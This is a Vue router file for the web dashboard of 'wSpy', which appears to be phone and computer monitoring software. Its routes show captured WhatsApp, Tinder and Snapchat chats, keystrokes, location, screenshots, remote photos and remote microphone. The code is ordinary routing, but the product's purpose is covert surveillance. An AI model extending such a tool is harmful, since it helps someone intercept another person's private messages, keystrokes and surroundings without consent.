import Vue from 'vue'
import Router from 'vue-router'
import { demoMainLayoutRoutes } from '@/demo/routerFragments'

Vue.use(Router)

const router = new Router({
  mode: 'history',
  base: process.env.BASE_URL,
  scrollBehavior() {
    return {x: 0, y: 0}
  },
  routes: [
    {
      // =============================================================================
      // MAIN LAYOUT ROUTES
      // =============================================================================
      path: '',
      component: () => import('./layouts/main/Main.vue'),
      children: [
        // =============================================================================
        // Theme Routes
        // =============================================================================

        {
          path: '/',
          redirect: '/pages/login'
        },
        {
          path: '/mobile/dashboard',
          name: 'dashboardMobile',
          component: () => import('@/views/DashboardMobile.vue'),
          meta: {
            rule: 'editor'
          }
        },
        {
          path: '/desktop/dashboard',
          name: 'dashboardDesktop',
          component: () => import('@/views/DashboardDesktop.vue'),
          meta: {
            rule: 'editor'
          }
        },
        ...demoMainLayoutRoutes,

        // =============================================================================
        // wSpy Mobile - Redes sociais
        // =============================================================================
        {
          path: '/mobile/whatsapp-chat',
          name: 'whatsapp-chat',
          component: () => import('@/views/apps/mobile/ChatWhatsApp.vue'),
          meta: {
            rule: 'editor'
          }
        },
        {
          path: '/mobile/whatsapp-audio',
          name: 'whatsapp-audio',
          component: () => import('@/views/mobile/Whatsappaudio.vue'),
          meta: {
            proAppOnly: true,
            rule: 'editor'
          }
        },
        {
          path: '/mobile/whatsapp-call',
          name: 'whatsapp-call',
          component: () => import('@/views/mobile/Whatsappcall.vue'),
          meta: {
            proAppOnly: true,
            rule: 'editor'
          }
        },
        {
          path: '/mobile/instagram-chat',
          name: 'instagram-chat',
          component: () => import('@/views/apps/mobile/ChatInstagram.vue'),
          meta: {
            rule: 'editor'
          }
        },
        {
          path: '/mobile/telegram-chat',
          name: 'telegram-chat',
          component: () => import('@/views/apps/mobile/ChatTelegram.vue'),
          meta: {
            rule: 'editor'
          }
        },
        {
          path: '/mobile/tinder-chat',
          name: 'tinder-chat',
          component: () => import('@/views/apps/mobile/ChatTinder.vue'),
          meta: {
            rule: 'editor'
          }
        },
        {
          path: '/mobile/kwai-chat',
          name: 'kwai-chat',
          component: () => import('@/views/apps/mobile/ChatKwai.vue'),
          meta: {
            rule: 'editor'
          }
        },
        {
          path: '/mobile/badoo-chat',
          name: 'badoo-chat',
          component: () => import('@/views/apps/mobile/ChatBadoo.vue'),
          meta: {
            rule: 'editor'
          }
        },
        {
          path: '/mobile/snapchat-chat',
          name: 'snapchat-chat',
          component: () => import('@/views/apps/mobile/ChatSnapchat.vue'),
          meta: {
            rule: 'editor'
          }
        },
        {
          path: '/novo-dispositivo',
          name: 'novodispositivo',
          component: () => import('@/views/NovoDispositivo.vue'),
          meta: {
            rule: 'editor'
          }
        },
        {
          path: '/transferir-licenca-dispositivo/:tipo/:id',
          name: 'transferirlicencaDispositivo',
          component: () => import('@/views/TransferirLicencaDispositivo.vue'),
          meta: {
            rule: 'editor'
          }
        },
        {
          path: '/apagar-dados/:uid',
          name: 'apagarDados',
          component: () => import('@/views/ApagarDados.vue'),
          meta: {
            rule: 'editor'
          }
        },
        {
          path: '/mobile/download/:uid',
          name: 'downloadMobile',
          component: () => import('@/views/DownloadMobile.vue'),
          meta: {
            rule: 'editor'
          }
        },
        {
          path: '/apagar-dados-computador/:uid',
          name: 'apagarDadosComputador',
          component: () => import('@/views/ApagarDadosComputador.vue'),
          meta: {
            rule: 'editor'
          }
        },
        {
          path: '/planos/:type/:uid/:product_id',
          name: 'planos',
          component: () => import('@/views/Planos.vue'),
          meta: {
            rule: 'editor'
          }
        },
        {
          path: '/dispositivo',
          name: 'dispositivos',
          component: () => import('@/views/Dispositivo.vue'),
          meta: {
            rule: 'editor'
          }
        },
        {
          path: '/subscriptions',
          name: 'subscriptions',
          component: () => import('@/views/Subscriptions.vue'),
          meta: {
            rule: 'editor'
          }
        },
        {
          path: '/transferir-dispositivos',
          name: 'transferir-dispositivos',
          component: () => import('@/views/TransferirDispositivos.vue'),
          meta: {
            rule: 'editor'
          }
        },
        {
          path: '/transferir-licenca',
          name: 'transferirlicenca',
          component: () => import('@/views/TransferirLicenca.vue'),
          meta: {
            rule: 'editor'
          }
        },
        {
          path: '/desktop-adicionar-licenca',
          name: 'desktopAdicionarLicenca',
          component: () => import('@/views/DesktopAdicionarLicenca.vue'),
          meta: {
            rule: 'editor'
          }
        },
        {
          path: '/mobile-desbloquear-conteudo/:uid',
          name: 'mobileDesbloquearConteudo',
          component: () => import('@/views/MobileDesbloquearConteudo.vue'),
          meta: {
            rule: 'editor'
          }
        },

        // =============================================================================
        // wSpy Mobile - Monitoramento
        // =============================================================================
        {
          path: '/mobile/apps',
          name: 'apps',
          component: () => import('@/views/mobile/Apps.vue'),
          meta: {
            proAppOnly: true,
            rule: 'editor'
          }
        },
        {
          path: '/mobile/chamadas',
          name: 'chamadas',
          component: () => import('@/views/mobile/Chamada.vue'),
          meta: {
            rule: 'editor'
          }
        },
        {
          path: '/mobile/teclas',
          name: 'teclas',
          component: () => import('@/views/mobile/Tecla.vue'),
          meta: {
            rule: 'editor'
          }
        },
        {
          path: '/mobile/contatos',
          name: 'contatos',
          component: () => import('@/views/mobile/Contato.vue'),
          meta: {
            rule: 'editor'
          }
        },
        {
          path: '/mobile/sites',
          name: 'sites',
          component: () => import('@/views/mobile/Site.vue'),
          meta: {
            rule: 'editor'
          }
        },
        {
          path: '/mobile/pesquisas',
          name: 'pesquisas',
          component: () => import('@/views/mobile/Pesquisa.vue'),
          meta: {
            rule: 'editor'
          }
        },
        {
          path: '/mobile/sms-chat',
          name: 'mobile-sms-chat',
          component: () => import('@/views/apps/mobile/ChatSms.vue'),
          meta: {
            rule: 'editor'
          }
        },
        {
          path: '/mobile/localizacao',
          name: 'localizacao',
          component: () => import('@/views/mobile/Localizacao.vue'),
          meta: {
            rule: 'editor'
          }
        },
        {
          path: '/mobile/zona-segura',
          name: 'zonasegura',
          component: () => import('@/views/mobile/ZonaSegura.vue'),
          meta: {
            rule: 'editor'
          }
        },
        {
          path: '/mobile/photogallery',
          name: 'photogallery',
          component: () => import('@/views/mobile/Photogallery.vue'),
          meta: {
            rule: 'editor'
          }
        },
        {
          path: '/mobile/screenshot',
          name: 'screenshot',
          component: () => import('@/views/mobile/Screenshot.vue'),
          meta: {
            rule: 'editor'
          }
        },
        {
          path: '/mobile/foto-remota',
          name: 'foto-remota',
          component: () => import('@/views/mobile/Remotephoto.vue'),
          meta: {
            proAppOnly: true,
            rule: 'editor'
          }
        },
        {
          path: '/mobile/remotephoto',
          name: 'remotephoto',
          component: () => import('@/views/mobile/Remotephoto.vue'),
          meta: {
            proAppOnly: true,
            rule: 'editor'
          }
        },
        {
          path: '/mobile/microfone',
          name: 'microfone',
          component: () => import('@/views/mobile/Microfone.vue'),
          meta: {
            proAppOnly: true,
            rule: 'editor'
          }
        },

        // =============================================================================
        // WSPY DESKTOP
        // =============================================================================
        {
          path: '/desktop/sites',
          name: 'sitedesktop',
          component: () => import('@/views/desktop/Site.vue'),
          meta: {
            rule: 'editor'
          }
        },
        {
          path: '/desktop/teclas',
          name: 'tecladesktop',
          component: () => import('@/views/desktop/Tecla.vue'),
          meta: {
            rule: 'editor'
          }
        },
        {
          path: '/desktop/pesquisas',
          name: 'pesquisadesktop',
          component: () => import('@/views/desktop/Pesquisa.vue'),
          meta: {
            rule: 'editor'
          }
        },
        {
          path: '/desktop/telas',
          name: 'screenshotdesktop',
          component: () => import('@/views/desktop/Tela.vue'),
          meta: {
            rule: 'editor'
          }
        },

        // =============================================================================
        // Pages Routes
        // =============================================================================
        {
          path: '/conta/perfil',
          name: 'pageProfile',
          component: () => import('@/views/pages/Profile.vue'),
          meta: {
            breadcrumb: [
              {title: 'Home', url: '/'},
              {title: 'Pages'},
              {title: 'Profile', active: true}
            ],
            pageTitle: 'Profile',
            rule: 'editor'
          }
        },
        {
          path: '/conta/download',
          name: 'pageDownload',
          component: () => import('@/views/pages/Download.vue'),
          meta: {
            breadcrumb: [
              {title: 'Home', url: '/'},
              {title: 'Pages'},
              {title: 'Download', active: true}
            ],
            pageTitle: 'Download',
            rule: 'editor'
          }
        },
        {
          path: '/pages/faq',
          name: 'pageFAQ',
          component: () => import('@/views/pages/Faq.vue'),
          meta: {
            breadcrumb: [
              {title: 'Home', url: '/'},
              {title: 'Pages'},
              {title: 'FAQ', active: true}
            ],
            pageTitle: 'FAQ',
            rule: 'editor'
          }
        },
        {
          path: '/pages/suporte',
          name: 'Suporte',
          component: () => import('@/views/pages/Suporte.vue'),
          meta: {
            breadcrumb: [
              {title: 'Home', url: '/'},
              {title: 'Pages'},
              {title: 'Suporte', active: true}
            ],
            pageTitle: 'Suporte',
            rule: 'editor'
          }
        },
        {
          path: '/pages/videos',
          name: 'Videos',
          component: () => import('@/views/pages/Video.vue'),
          meta: {
            breadcrumb: [
              {title: 'Home', url: '/'},
              {title: 'Pages'},
              {title: 'Video', active: true}
            ],
            pageTitle: 'Video',
            rule: 'editor'
          }
        },
        {
          path: '/pages/area-de-membros',
          name: 'AreaMembros',
          component: () => import('@/views/pages/MembersArea.vue'),
          meta: {
            breadcrumb: [
              {title: 'Home', url: '/'},
              {title: 'Pages'},
              {title: 'Área de Membros', active: true}
            ],
            pageTitle: 'Área de Membros',
            rule: 'editor'
          }
        },
        {
          path: '/pages/termos-uso',
          name: 'Termos-Uso',
          component: () => import('@/views/pages/TermosUso.vue'),
          meta: {
            breadcrumb: [
              {title: 'Home', url: '/'},
              {title: 'Pages'},
              {title: 'Termos', active: true}
            ],
            pageTitle: 'Termos',
            rule: 'editor'
          }
        },
        {
          path: '/pages/termos-cancelamentos',
          name: 'Termos-Cancelamentos',
          component: () => import('@/views/pages/TermosCancelamento.vue'),
          meta: {
            breadcrumb: [
              {title: 'Home', url: '/'},
              {title: 'Pages'},
              {title: 'Termos', active: true}
            ],
            pageTitle: 'Termos',
            rule: 'editor'
          }
        },
        {
          path: '/pages/suporte/categoria',
          name: 'Suporte Categoria',
          component: () => import('@/views/pages/SuporteCategoria.vue'),
          meta: {
            breadcrumb: [
              {title: 'Home', url: '/'},
              {title: 'Pages'},
              {title: 'Suporte', url: '/pages/suporte'},
              {title: 'Suporte Categoria', active: true}
            ],
            rule: 'editor'
          }
        },
        {
          path: '/pages/suporte/categoria/pergunta',
          name: 'pageKnowledgeBaseCategoryQuestion',
          component: () => import('@/views/pages/SuporteCategoriaPergunta.vue'),
          meta: {
            breadcrumb: [
              {title: 'Home', url: '/'},
              {title: 'Pages'},
              {title: 'KnowledgeBase', url: '/pages/suporte'},
              {title: 'Category', url: '/pages/suporte/categoria'},
              {title: 'Question', active: true}
            ],
            rule: 'editor'
          }
        }
      ]
    },
    // =============================================================================
    // FULL PAGE LAYOUTS
    // =============================================================================
    {
      path: '',
      component: () => import('@/layouts/full-page/FullPage.vue'),
      children: [
        // =============================================================================
        // PAGES
        // =============================================================================
        {
          path: '/pages/login',
          name: 'pageLogin',
          component: () => import('@/views/pages/Login.vue'),
          meta: {
            rule: 'editor'
          }
        },
        {
          path: '/pages/register',
          name: 'pageRegister',
          component: () => import('@/views/pages/Register.vue'),
          meta: {
            rule: 'editor'
          }
        },
        {
          path: '/pages/onboarding-v1',
          name: 'pageOnboardingV1',
          component: () => import('@/views/pages/OnboardingV1.vue'),
          meta: {
            rule: 'editor'
          }
        },
        {
          path: '/pages/onboarding-v1-password',
          name: 'pageOnboardingV1Password',
          component: () => import('@/views/pages/OnboardingV1-Password.vue'),
          meta: {
            rule: 'editor'
          }
        },
        {
          path: '/pages/onboarding-v1-thanks',
          name: 'pageOnboardingV1Thanks',
          component: () => import('@/views/pages/OnboardingV1-Thanks.vue'),
          meta: {
            rule: 'editor'
          }
        },
        {
          path: '/pages/sign-up',
          name: 'pageSignUp',
          component: () => import('@/views/pages/SignUp.vue'),
          meta: {
            rule: 'editor'
          }
        },
        {
          path: '/pages/sign-up/plans',
          name: 'pageSignUpPlans',
          component: () => import('@/views/pages/SignUp-Plans.vue'),
          meta: {
            rule: 'editor'
          }
        },
        {
          path: '/pages/sign-up/payment',
          name: 'pageSignUpPayment',
          component: () => import('@/views/pages/SignUp-Payment.vue'),
          meta: {
            rule: 'editor'
          }
        },
        {
          path: '/pages/forgot-password',
          name: 'pageForgotPassword',
          component: () => import('@/views/pages/ForgotPassword.vue'),
          meta: {
            rule: 'editor'
          }
        },
        {
          path: '/pages/reset-password',
          name: 'pageResetPassword',
          component: () => import('@/views/pages/ResetPassword.vue'),
          meta: {
            rule: 'editor'
          }
        },
        {
          path: '/pages/error-404',
          name: 'pageError404',
          component: () => import('@/views/pages/Error404.vue'),
          meta: {
            rule: 'editor'
          }
        },
        {
          path: '/pages/error-500',
          name: 'pageError500',
          component: () => import('@/views/pages/Error500.vue'),
          meta: {
            rule: 'editor'
          }
        },
        {
          path: '/checkout/payment',
          name: 'checkout-payment',
          component: () => import('@/views/pages/Checkout.vue')
        },
        {
          path: '/checkout/complete',
          name: 'checkout-complete',
          component: () => import('@/views/pages/Checkout.vue')
        }
      ]
    },
    // Redirect to 404 page, if no match found
    {
      path: '*',
      redirect: '/pages/error-404'
    }
  ]
})

router.afterEach(() => {
  // Remove initial loading
  const appLoading = document.getElementById('loading-bg')
  if (appLoading) {
    appLoading.style.display = 'none'
  }

  if (process.env.VUE_APP_CHAT_URL_BOT.length > 0) {
    /* global Tawk_API */
    if (Tawk_API && Tawk_API.getStatus) {
      if (window.location.href.indexOf('/login') === -1 && window.location.href.indexOf('/dispositivo') === -1) {
        Tawk_API.hideWidget();
      }

      var pageStatus = Tawk_API.getStatus()
      if ((window.location.href.indexOf('/login') > -1 || window.location.href.indexOf('/dispositivo') > -1)
        && pageStatus === 'offline'
        && process.env.VUE_APP_CHAT_URL_BOT.length > 0) {
        Tawk_API.hideWidget();

        const botmaker = document.getElementById('botmaker')
        if (!botmaker) {
          let js = document.createElement('script')
          js.type = 'text/javascript'
          js.async = 1
          js.src = process.env.VUE_APP_CHAT_URL_BOT
          js.id = 'botmaker'
          document.body.appendChild(js)
        }

        /* global bmShow */
        if (typeof bmShow !== 'undefined') {
          bmShow()
        }
        /* global bmHide */
      } else if (typeof bmHide !== 'undefined') {
        bmHide()
      }
    }
  }
})

router.beforeEach((to, from, next) => {
  if (to.path === '/pages/login') {
    Vue.localStorage.set('token', '')
  }

  var token = Vue.localStorage.get('token')

  if (
    (!token ||
      token == '' ||
      typeof token === undefined ||
      typeof token === 'undefined') &&
    to.path !== '/pages/login' &&
    to.path !== '/pages/forgot-password' &&
    to.path !== '/pages/error-404' &&
    to.path !== '/pages/error-500' &&
    to.path !== '/pages/register' &&
    to.path !== '/pages/onboarding-v1' &&
    to.path !== '/pages/onboarding-v1-thanks' &&
    to.path !== '/pages/sign-up' &&
    to.path !== '/pages/sign-up/plans' &&
    to.path !== '/pages/sign-up/payment' &&
    to.path !== '/checkout/payment' &&
    to.path !== '/checkout/complete' &&
    !to.path.startsWith('/demo')
  ) {
    Vue.localStorage.set('uid', '')

    next({
      name: 'pageLogin',
      path: '/pages/login',
      query: {redirect: to.fullPath}
    })
  } else {
    next()
  }
})

export default router
